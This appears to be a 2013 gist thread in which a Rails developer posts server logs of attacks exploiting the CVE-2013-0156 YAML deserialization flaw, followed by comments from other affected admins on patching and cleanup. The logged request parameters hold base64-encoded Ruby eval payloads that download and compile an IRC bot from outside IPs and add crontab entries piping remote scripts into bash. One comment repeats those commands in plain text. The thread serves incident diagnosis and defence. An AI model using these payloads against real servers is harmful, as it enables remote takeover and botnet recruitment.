Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.7ms)
Rendered layouts/_social_links.html.erb (108.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.4ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

from 95.138.186.181:

Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000
Processing by PagesController#show as HTML
Parameters: {""\"yaml\">", "#10"=>nil, "---"=>nil, "!ruby/object:Gem::Requirement"=>nil, "requirements:"=>nil, "- !ruby/object:Rack::Session::Abstract::SessionHash"=>nil, "env:"=>nil, "HTTP_COOKIE: \"a"=>"BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA==\"", "by: !ruby/object:Rack::Session::Cookie"=>nil, "coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}"=>nil, "key: a"=>nil, "secrets: "=>[nil], "exists: true"=>nil, ""=>nil, "id"=>"home"}
Rendered inline template within layouts/heavy (80.4ms)
Rendered layouts/_head.html.erb (3.4ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (9.4ms)
Rendered layouts/_social_links.html.erb (2.9ms)
Rendered layouts/_messages.html.haml (4.3ms)
Rendered layouts/_header.html.erb (1.9ms)
Rendered layouts/_menu.html.erb (0.6ms)
Rendered layouts/_my_favs.html.haml (5.3ms)

Rendered layouts/_ride_request_form.html.erb (14.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.2ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.1ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (12.5ms)
Rendered layouts/_social_links.html.erb (2.3ms)
Rendered layouts/_messages.html.haml (3.3ms)
Rendered layouts/_header.html.erb (134.1ms)
Rendered layouts/_menu.html.erb (0.8ms)
Rendered layouts/_my_favs.html.haml (4.6ms)

Rendered layouts/_ride_request_form.html.erb (13.1ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.6ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.9ms)

Rendered layouts/_ride_request_form.html.erb (4.2ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (3.9ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)

from 188.190.126.105:

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (7.1ms)
Rendered layouts/_social_links.html.erb (3.5ms)
Rendered layouts/_messages.html.haml (3.0ms)
Rendered layouts/_header.html.erb (1.6ms)
Rendered layouts/_menu.html.erb (0.7ms)
Rendered layouts/_my_favs.html.haml (4.7ms)

Rendered layouts/_ride_request_form.html.erb (15.1ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.0ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.5ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.5ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (9.7ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.6ms)
Rendered layouts/_header.html.erb (1.0ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2suYyAxODguMTkwLjEyNC4xMjAva2FpdGVuLXNyYy5jIikKc3lzdGVtKCJnY2MgLW8gL3Zhci90bXAva2EgL3Zhci90bXAvay5jIikKc3lzdGVtKCJjaG1vZCAreCAvdmFyL3RtcC9rYSIpCnN5c3RlbSgiL3Zhci90bXAva2EiKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvay5jIDE4OC4xOTAuMTI0LjEyMC9rYWl0ZW4tc3JjLmMgJiYgZ2NjIC1vIC92YXIvdG1wL2thIC92YXIvdG1wL2suYyAmJiBjaG1vZCAreCAvdmFyL3RtcC9rYSAmJiAvdmFyL3RtcC9rYSIpIHwgY3JvbnRhYiAtJyk=].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (155.5ms)
Rendered layouts/_social_links.html.erb (1.3ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

Regards.

It's one of the stable ones, sorry I can't check now.

Ruby version: 1.9.3-p327
Rails version: 3.2

Hi here !

I've disconnected my server until finding solution .. and I believe I have it :

chmod 700 /usr/bin/wget

=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
this is a recent thread .. so I will test it tonight..

more search about subject, it seems to be this exploit :

http://1337day.com/exploit/20596

after doing the chmod on wget, I receive another log from my server :

/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied

not forget to vi /var/spool/cron/crontabs/www-data
and delete the line about wget

last informations,

I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

Are you running nginx < 1.4.1? http://mailman.nginx.org/pipermail/nginx-announce/2013/000112.html

This is an exploit of an old Rails bug (CVE-2013-0156).

Clean your systems and update to 3.2.12.

In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.

https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security

I'm building an application with will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses.

For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.

Sign up to be informed when this is ready here: http://www.rubyaudit.com

please update your rails-installation:

http://charlie.bz/blog/rails-3.2.10-remote-code-execution

The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck

If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.

It looks like it's part of a botnet, as it's using IRC.

@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".

You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.

Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.

All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!

Hi,

an what about my configuration ??

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :

• k.c, k and ka files in /var/tmp (probably irc script)

• an new line in my crontab executing some wget like this :

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k‏

I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).

I'm still searching how the malicious scripts were upload to my server ...

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

my server was infected too, should I do a reinstall?

definetly

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

Ok, anyway we known now where the problem comes from.

Sounds like this one
http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html